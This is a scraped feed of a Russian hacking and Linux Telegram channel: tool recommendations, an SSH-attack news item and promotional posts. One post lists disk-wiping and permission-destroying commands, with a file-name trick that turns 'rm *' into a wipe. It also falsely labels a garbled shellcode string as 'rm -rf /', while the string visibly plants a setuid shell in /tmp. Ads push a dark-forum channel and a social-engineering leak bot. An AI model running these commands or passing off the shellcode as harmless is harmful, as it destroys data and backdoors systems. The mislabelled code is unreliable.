1. DDosify — Платформа для тестирования производительности
DDosify - отличный инструмент, если вам нужно проверить, как ваше приложение будет вести себя при большом количестве пользователей, обращающихся к нему со всего мира.

2. Kopia — Кросс-платформенный инструмент для резервного копирования
Kopia предоставляет удобный и простой способ создания зашифрованных и сжатых резервных копий данных и сохранения их, включая хранение в облачном хранилище.

3. Traefik — Обратный прокси-сервер и балансировщик нагрузки
Traefik довольно известен, так что вы, возможно, уже слышали о нем. Он отлично подходит для самостоятельной настройки прокси-сервера для ваших микросервисов. Он автоматически настраивает соединения на основе ваших настроек.

4. Httpx — Инструмент для работы с HTTP
С помощью Httpx вы можете регулярно отправлять запросы для получения данных о веб-сайтах. Мне нравится использовать его для проверки работоспособности моих сайтов и приложений.

5. Evcc — Расширяемый контроллер зарядки для электромобилей
Evcc - многофункциональный контроллер для зарядки электромобилей.

Life-Hack - Linux/Хакинг/Хакер/ИБ/Osint

#подборка

Читать полностью…

#статья

Базовая безопасность в Linux

Читать полностью…

#обзор

Как узнать, кто ворует интернет по WiFi и защититься от этого

Читать полностью…

#статья

Тайный агент в вашем компьютере: что такое троянский вирус и как с ним бороться?

Читать полностью…

40 000+ шаблонов Nuclei для сканирования и обнаружения безопасности в различных веб-приложениях и службах.

Nuclei используется для отправки запросов к целям на основе шаблона, что позволяет исключить ложные срабатывания и обеспечить быстрое сканирование большого количества хостов.

Nuclei предлагает сканирование для различных протоколов, включая TCP, DNS, HTTP, SSL, File, Whois, Websocket, Headless, Code и т. д. Благодаря мощным и гибким шаблонам Nuclei можно использовать для моделирования всех видов проверок безопасности.

Ссылка на Github
Ссылка на Git Nuclei

#рекомендация
#рекомендации

Читать полностью…

#обзор

В новый год с новым ядром: что нового и интересного в Linux 6.7?

Читать полностью…

Huginn

Huginn - платформа для создания «агентов», которые могут автоматически выполнять действия от вашего имени. Они способны извлекать информацию из Интернета, отслеживать события и предпринимать действия от вашего имени.

Вот некоторые примеры того, что можно делать с помощью Huginn:
- Отслеживать погоду и получать уведомления по электронной почте, когда ожидается дождь (или снег) на следующий день ("Не забудьте зонтик!")
- Отслеживать авиаперелеты или покупки
- Возможность подключения к большому количеству различных сервисов
- Отслеживание высокочастотных событий и отправка SMS-сообщений в моменты их "всплеска", например, при упоминании "чрезвычайной ситуации в Сан-Франциско"
- Отправка и получение вебхуков
- Отслеживание собственного местоположения с течением времени

Ссылка на GitHub

Life-Hack - Linux/Хакинг/Хакер/ИБ/Osint

#рекомендация
#рекомендации

Читать полностью…

✅Один из топовых каналов по кибербезопасности.
-Вирусология;
-ГЕО отслеживание;
-Слив актуальных схем по заработку;
-Безопасность и очистка следов;
-Криптовалюта;
-Бесплатные раздачи,платных подписок.

⚡️Действуй: @darkforum_k

Читать полностью…

С новым 2️⃣0️⃣2️⃣4️⃣ годом!

Читать полностью…

Шпаргалка по Nmap

Ссылка на GitHub

Life-Hack - Linux/Хакинг/Хакер/ИБ/Osint

#рекомендация
#рекомендации

Читать полностью…

Обновите свой Linux-сервер: обнаружен рост атак с установкой DDoS-ботов и криптомайнеров

Специалисты Центра экстренного реагирования на инциденты безопасности AhnLab (Security Emergency Response Center, ASEC) предупреждают о росте атак, нацеленных на плохо управляемые SSH-серверы Linux, в первую очередь направленных на установку DDoS-ботов и майнера криптовалюты CoinMiner.

На этапе разведки злоумышленники выполняют сканирование IP-адресов в поисках серверов с активированной службой SSH или портом 22, а затем запускают атаку полным перебором (брутфорс) или атаку по словарю для получения учетных данных. Киберпреступники также могут устанавливать вредоносное ПО для сканирования, выполнять атаки методом перебора и продавать взломанные IP-адреса и учетные данные в даркнете.

Распространенные вредоносные программы, используемые для атак на плохо управляемые SSH-серверы Linux, включают боты ShellBot, Tsunami, ChinaZ DDoS Bot и криптомайнер XMRig.

После успешного входа в систему злоумышленник сначала выполнил следующую команду, чтобы проверить общее количество ядер ЦП.

> grep -c ^processor /proc/cpuinfo

Использование этой команды предполагает, что атакующий оценивал вычислительную мощность системы, возможно, чтобы понять её способности для запуска определенных типов вредоносных программ или инструментов атаки.

Затем киберпреступник снова вошел в систему, используя те же учетные данные, и загрузил сжатый файл. Сжатый файл содержит сканер портов и инструмент атаки по словарю SSH. Кроме того, можно увидеть команды, случайно введенные атакующим, например «cd /ev/network» и «unaem 0a».

В ASEC полагают, что использованные в атаках средства основаны на инструментах, созданных старой командой PRG. Каждый злоумышленник создал свою собственную версию инструментов, модифицировав их.

IT Дайджест / IT Новости / IT / Технологии

Читать полностью…

Что такое Flipper Zero и насколько он опасен в руках злоумышленников

Краткий ликбез по хакерскому мультитулу Flipper Zero

Flipper Zero — небольшое устройство, оснащённое крошечным монохромным LCD-дисплеем с приятной оранжевой подсветкой, физическими кнопками управления и множеством разъёмов и интерфейсов, о которых мы подробнее поговорим далее.

Читать статью тут

#обзор

Life-Hack - Linux/Хакинг/Хакер/ИБ/Osint

Читать полностью…

#обзор

Хакеры под елкой: заключительный дайджест российских киберинцидентов 2023

Читать полностью…

Айтишники уже всех задолбали😡

Везде выёживаются своими зарплатами. Хотя такие же деньги может зарабатывать любой, кто хоть раз держал в руках отвёртку. Не веришь?

Смотри, что Дима Иванов пишет. Он просто покупает и перепродаёт компы, делая на этом большие деньги. А ещё учит этому подписчиков, спокойно зарабатывать от 100к в месяц!

Он даёт понятные пошаговые инструкции, которым просто нужно следовать. Будто готовишь суп - написано нарезать лук - режешь, написано варить 20 минут - варишь. Результат зависит лишь от того, насколько точно ты выполняешь эти действия 🤷

👉 Можно уйти с найма
👉 Можно подрабатывать по вечерам
👉 Можно начать с полного нуля

Да тут даже бабуля справится. Подписывайся на Димана и делай деньги. 👇

/channel/+JExGkVCq1Ww4NTc6

Читать полностью…

Полный отчет Github за 2023 о состоянии проектов.

GitHub только что опубликовал свой последний отчет о состоянии открых проектов.
Они выделили основные тенденции:

🔸 Разработчики все чаще используют генеративный ИИ: Все больше разработчиков работают с моделями OpenAI ( 92% ) и с моделями других ИИ-компаний;

🔸 Растет тренд на работу с облачными приложениями:

Рабочие процессы инфраструктуры кода (IaC), основанные на Git, используются все большим количеством декларативных языков; развертывание облаков становится стандартом; резко возросло количество использования разработчиками Dockerfiles, контейнеров, IaC и других облачных нативных технологий.

🔸 В 2023 году на GitHub было создано 98 млн новых проектов (за 2022 год – 85.7 млн, за 2021 – 61 млн, за 2020 – 60 млн). Общее число проектов достигло отметки в 420 млн (+27%), а число публично доступных репозиториев – 284 млн (+22%).

🔸 За год добавлено около 65 тысяч новых проектов, связанных с машинным обучением.

🔸 Javascript остается самым популярным язком. Второе место сохраняет за собой Python.Популярность TypeScript выросла на 37 %. и он вытеснил на четвёртое место язык Java. 5, 6 и 7 места удержали за собой языки С#, C++ и PHP. На восьмое место поднялся язык С, который вытеснил на девятое место Shell. Десятое место занял Go.

🔸 𝗥𝘂𝘀𝘁 растет быстрее всех остальных языков в этом году (рост на 40 % по сравнению с предыдущим годом).

🔸 𝟰.𝟯 миилиона открытых и приватных репозиториев используют 𝗗𝗼𝗰𝗸𝗲𝗿𝗳𝗶𝗹𝗲𝘀. Это является следcтвием роста использования Terraform и других облачных нативных технологий.

🔸 Аудитория GitHub за год выросла на 20.2 млн пользователей (+26%) и теперь достигает 114 млн. На первом месте по числу разработчиков находится США, на втором – Индия, на третьем – Китай.

🔸 Сингапур занял первое место по количеству новых разработчиков в этом году и занимает первое место в мире по соотношению числа разработчиков к общей численности населения.

Life-Hack - Linux/Хакинг/Хакер/ИБ/Osint

Читать полностью…

Map Poster Creator - проект для создания красивых карт дорог любых городов, зон, участков по данным OSM. На карту можно добавлять зеленые зоны, дороги, реки, пруды, озера. Есть несколько готовых цветовых схем, но вы можете легко добавить свои собственные цвета.

Ссылка на Github

Life-Hack - Linux/Хакинг/Хакер/ИБ/Osint

#рекомендация
#рекомендации

Читать полностью…

Snoop 1.4.0 - это один из наиболее перспективных инструментов OSINT для поиска по никнейму.

Новая версия включает в себя следующие обновления:
- База данных поиска теперь охватывает 3716 сайтов;
- Версия Snoop для GNU/Linux ускорена на 140%, что почти в 2.5 раза, в частности поиск по имени пользователя в полной базе данных Snoop в режиме 'быстрого поиска' ('--quick/-q') занимает менее минуты при скорости интернет-соединения не менее 12 Мбит/с;
- Ускорен запуск Snoop на старых ПК с ОС Windows/HDD;
- Добавлен новый интеллектуальный алгоритм автоматического определения кодировок сайтов при поиске в различных режимах, даже если они не указаны явно или вызывают проблемы.

Этот инструмент написан на языке Python и распространяется под лицензией, ограничивающей его использование только для личных целей. При этом проект является ответвлением от кодовой базы проекта Sherlock, который поставляется под лицензией MIT (форк был создан из-за невозможности расширить базу сайтов).

Snoop включен в российский Единый реестр российских программ для электронных вычислительных машин и баз данных, с заявленным кодом 26.30.11.16: "Программное обеспечение, обеспечивающее выполнение установленных действий при проведении оперативно-розыскных мероприятий:: No7012 приказ 07.10.2020 No515". На данный момент Snoop отслеживает наличие пользователя на более чем 3700 интернет-ресурсах в полной версии и на самых популярных из них в демонстрационной версии.

Ссылка на GitHub

Life-Hack - Linux/Хакинг/Хакер/ИБ/Osint

#рекомендация
#рекомендации

Читать полностью…

17 суперинструментов для разработки фронтенда

Читать полностью…

👩‍💻 OVERLOAD - это мощная и полуавтоматическая экосистема, созданная для упрощения сложных процессов анализа безопасности, сбора информации, социальной инженерии, мониторинга утечек данных и поиска уязвимостей.

🌐 В боте собраны 50 инструментов, которые помогут вам защититься от киберугроз и деанонимизации, а гибкие тарифы помогут выбрать оптимальный вариант работы с ботом:

1️⃣ Freelancer - для начинающих специалистов.
2️⃣ Leak Explorer - мониторинг утечек данных.
3️⃣ Pentest - для пентестеров, аудит безопасности.
4️⃣ Parser - анализ больших данных и SMM.
5️⃣ Social Engineering - социальная инженерия, OSINT.
6️⃣ Leak Engineering - СИ, OSINT и работа с утечками.
7️⃣ Deluxe - комплексный доступ, все инструменты.

🔐 Защитите свои ресурсы, обезопасьте свою информацию, распознайте слабые места в сети - всё это возможно с OVERLOAD

#promo

Читать полностью…

OpenSquat - это полезный инструмент с открытым исходным кодом, позволяющий выявлять угрозы киберсквоттинга для компаний или доменов.

OpenSquat поддерживает функции, такие как автоматическое обновление домена, обнаружение фишинговых доменов, подсчет схожести слов, интеграцию с другими службами, такими как VirusTotal, Quad9 DNS, а также множество других полезных возможностей.

git clone https://github.com/atenreiro/opensquat

pip install -r requirements.txt

Пример использования:

# Lazy run with default options
python opensquat.py

# for all the options
python opensquat.py -h

# Search for generic terms used in phishing campaigns (can lead to false-positives)
python opensquat.py -k generic.txt

# With DNS validation (quad9)
python opensquat.py --dns

# Subdomain search
python opensquat.py --subdomains

# Check for domains with open ports 80/443
python opensquat.py --portcheck

# With Phishing validation (Phishing Database)
python opensquat.py --phishing phish_results.txt

# Save output as JSON
python opensquat.py -o example.json -t json

# Save output as CSV
python opensquat.py -o example.csv -t csv

# Conduct a certificate transparency (ct) hunt
python opensquat.py --ct

# Period search - registrations from the last month (default: day)
python opensquat.py -p month

# Tweak confidence level. The lower values bring more false positives
# (0: very high, 1: high (default), 2: medium, 3: low, 4: very low
python opensquat.py -c 2

# All validations options
python opensquat.py --phishing phishing_domains.txt --dns --ct --subdomains --portcheck

▪Github
▪Docs

Life-Hack - Linux/Хакинг/Хакер/ИБ/Osint

#рекомендация
#рекомендации

Читать полностью…

10 команд Linux, которые убьют ваш сервер (для новичков)

Необратимые
▪️ rm –rf / - Удаляет всё, до чего только может добраться. Существует несколько вариаций для маскировки этой команды:

mkdir test

cd test

touch ./-r

touch ./-f

su

rm * /

release */
= “xebx3ex5bx31xc0x50x54x5ax83xecx64x68”
“xffxffxffxffx68xdfxd0xdfxd9x68x8dx99”
“xdfx81x68x8dx92xdfxd2x54x5exf7x16xf7”
“x56x04xf7x56x08xf7x56x0cx83xc4x74x56”
“x8dx73x08x56x53x54x59xb0x0bxcdx80x31”
“xc0x40xebxf9xe8xbdxffxffxffx2fx62x69”
“x6ex2fx73x68x00x2dx63x00”
“cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;”;

(16-ричное представление команды rm –rf /, его система тоже поймёт)

▪️ sudo dd if=/dev/zero of=/dev/sda bs=8m - Эта команда заполняет начальные 40Мбайт жесткого диска нулями, что делает невозможным восстановление важных данных и приводит к невозможности загрузки ОС.

▪️ shred /dev/sda - Эта команда удаляет все данные на жёстком диске.

▪️ mkfs.ext3 /dev/sda - Эта команда форматирует жесткий диск.

▪️ chmod -Rv 000 / - Эта команда отнимает все разрешения на все файлы и папки в системе, что делает невозможной даже перезагрузку системы. При ручной перезагрузке системы она больше не сможет запуститься нормально, так как запрашиваемые при загрузке компоненты будут недоступны.

▪️ chown -R nobody:nobody / - Эта команда меняет владельца всех файлов и папок системы на "никого".

Life-Hack - Linux/Хакинг/Хакер/ИБ/Osint

#рекомендация
#рекомендации

Читать полностью…

#статья

Почему с каждой новой версией Windows от нее усиливается усталость

Читать полностью…

Подборка громких новостей за 2024

Читать полностью…

Топ популярных постов за прошедшую неделю:

1. Полный курс по Wireshark от основ до продвинутого уровня
2. NotWG — запутанный туннель WireGuard для обхода обнаружения DPI
3. Bash Bible - репозиторий можно использовать как справочник для изучения различных команд Bash
4. Что такое Flipper Zero и насколько он опасен в руках злоумышленников
5. Шпаргалка по Nmap

Список прошлых подборок за декабрь, для чтения во время праздников:

- 17.12. - 24.12
- 10.12 - 17.24
- 03.12 - 10.12
- 26.11 - 03.12

#подборка

Life-Hack - Linux/Хакинг/Хакер/ИБ/Osint

Читать полностью…

#статья

Устройство TCP/Реализация SYN-flood атаки

Читать полностью…

#обзор

Пишем простой консольный мессенджер с end-to-end шифрованием поверх «Hidden Lake» сервисов

Читать полностью…

Calamares - это фреймворк установщика для дистрибутивов GNU/Linux, не зависящего от конкретных дистрибутивов.

Есть различные возможности, такие как ручное и автоматическое разбиение диска, гибкая настройка, модульная архитектура и широкий выбор готовых модулей.

Поддерживает множество языков, включая C++ и Python, для разработки модулей.

Полная совместимость с Qt 6 и KDE Frameworks 6, а также поддержка Qt5 и KDE Frameworks 5.

Ссылка на GitHub
Ссылка на сайт

Life-Hack - Linux/Хакинг/Хакер/ИБ/Osint

#рекомендация
#рекомендации

Читать полностью…

Bash Bible - этот репозиторий можно использовать как справочник для изучения различных команд Bash. Он содержит множество примеров.

Цель этой книги - документировать широко известные и менее известные методы выполнения различных задач, используя только встроенные возможности оболочки bash. Использование фрагментов из этой библии может помочь устранить ненужные зависимости от скриптов и, в большинстве случаев, ускорить их выполнение.

Фрагменты ниже прошли проверку с использованием shellcheck, и, где это применимо, были написаны тесты.

Ссылка на GitHub

Life-Hack - Linux/Хакинг/Хакер/ИБ/Osint

#рекомендация
#рекомендации

Читать полностью…

Life-Hack - Linux/Хакинг/Хакер/ИБ/Osint

Читать полностью…

NotWG — это запутанный туннель WireGuard для обхода обнаружения DPI

DPI может обнаруживать трафик WireGuard на основе фиксированных размеров сообщений инициирования, ответа и файлов cookie, а также наличия 4-байтового тега во всех сообщениях.

notWG запутывает пакеты, добавляя случайные ненужные байты к пакетам подтверждения и cookie, а также шифруя заголовок пакета с помощью хэша открытого ключа интерфейса и случайного одноразового номера.

Ссылка на GitHub

Life-Hack - Linux/Хакинг/Хакер/ИБ/Osint

#рекомендация
#рекомендации

Читать полностью…